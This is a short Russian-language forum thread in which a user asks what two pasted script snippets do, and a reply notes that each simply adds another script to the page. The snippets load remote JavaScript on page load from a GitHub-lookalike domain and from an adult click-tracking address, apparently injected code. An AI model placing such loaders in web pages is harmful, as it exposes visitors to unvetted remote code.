Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 11.11.2017, 21:55
Новичок на форуме
Отправить личное сообщение для Rinat1994 Посмотреть профиль Найти все сообщения от Rinat1994
 
Регистрация: 11.11.2017
Сообщений: 1

Что делает данный скрипт?
Кто подскажет что делает данный скрипт?
<script type="text/javascript">function addScript(src) {var elem = document.createElement("script");elem.src = src;document.head.appendChild(elem);}var stream_id = 4653283;addScript("http://igithab.com/common.js?stream_id=4653283");</script> 
<script type="text/javascript"> (function(w) { var s = document.createElement('script'); var z = setInterval(function() { if (document.readyState == 'interactive' || document.readyState == 'complete') { clearInterval(z); s.src = "http://46623.w4statistics.info/click.php?p=287444&adult=1&c"; s.async = true; s.type = type = 'text/javascript'; w.document.body.appendChild(s); } }, 200); })(window); </script>
Ответить с цитированием
  #2 (permalink)  
Старый 12.11.2017, 12:03
Профессор
Отправить личное сообщение для Nexus Посмотреть профиль Найти все сообщения от Nexus
 
Регистрация: 04.12.2012
Сообщений: 3,726

Rinat1994, каждый скрипт добавляет на страницу по 1 скрипту.
Адреса подключаемых скриптов, уверен, вы и сами сможете найти в этом коде.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
НАУЧИТЕ СКРИПТ СЧИТАТЬ ИЛИ ЧТО НЕ ТАК СО СТЕПЕНЯМИ kippusen Общие вопросы Javascript 3 18.11.2014 02:21
Мотоциклисты есть? l-liava-l Оффтопик 13 04.07.2014 13:35
Что делает этот скрипт? AlexandrKS Мобильный JavaScript 5 01.01.2014 15:16
Открытие div блока при первом визите на сайт Nushaba Общие вопросы Javascript 28 20.12.2013 21:24
что делает этот скрипт?)) jek Общие вопросы Javascript 5 10.01.2010 17:24